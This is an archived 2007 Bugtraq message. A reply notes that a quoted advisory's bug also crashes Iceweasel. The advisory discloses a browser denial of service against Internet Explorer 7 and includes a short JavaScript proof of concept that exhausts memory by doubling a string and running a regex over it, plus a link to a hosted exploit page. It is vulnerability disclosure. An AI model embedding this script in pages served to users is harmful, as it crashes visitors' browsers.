lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <20070417202744.GD4874@mumia.anarcat.ath.cx>
Date: Tue, 17 Apr 2007 16:27:45 -0400
From: The Anarcat <anarcat@...rcat.ath.cx>
To: "J. Oquendo" <sil@...iltrated.net>
Cc: bugtraq@...urityfocus.com
Subject: Re: Internet Explorer Crash

Actually, this also crashes Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.8.1.3) Gecko/20070310 Iceweasel/2.0.0.3 (Debian-2.0.0.3-1)

I would think that Firefox and most browsers implementing javascript
would die an horrible OOM death on this.

A.

On Tue, Apr 17, 2007 at 01:09:13PM -0400, J. Oquendo wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> Product: Internet Explorer Version 7.0.5730.11
> Impact: Browser crash possibly more
> Author: Jesus Oquendo
> echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'
> 
> 
> I. BACKGROUND
> Why bother? Who doesn't know what Internet Explorer and Microsoft are.
> 
> II. DESCRIPTION
> IE 7 is vulnerable to a script which causes the browser to hang. The
> memory and CPU usage go through the roof. Originally the script caused
> (and still causes) Safari and Konqueror to crash.
> 
> III SOLUTION
> Stop using Microsoft products or deal with a new advisory every other
> day.
> 
> IV. Proof
> http://www.infiltrated.net/stupidInternetExploder.html
> 
> V. Code
> 
> $ more /stupidInternetExploder.html
> 
> <script>
> 
> var reg = /(.)*/;
> 
> var z = 'Z';
>                while (z.length <= 
> 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
> 99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
> 99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
> 99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
> 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999) z+=z;
>        var boum = reg.exec(z);
> 
> </script>
> 
> Goodbye
> 
> 
> J. Oquendo
> http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
> sil . infiltrated @ net http://www.infiltrated.net 
> 
> The happiness of society is the end of government.
> John Adams
> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.3 (FreeBSD)
> 
> iD8DBQFGJQGJh3J3NhODp0MRArt5AKCVI+A0rHdYMOz9KYIbCxFkMN8QcgCbBBBC
> TCV7FOqA05H8sSDb0r8nSnk=
> =J/DW
> -----END PGP SIGNATURE-----
> 



-- 

Download attachment "signature.asc" of type "application/pgp-signature" (190 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ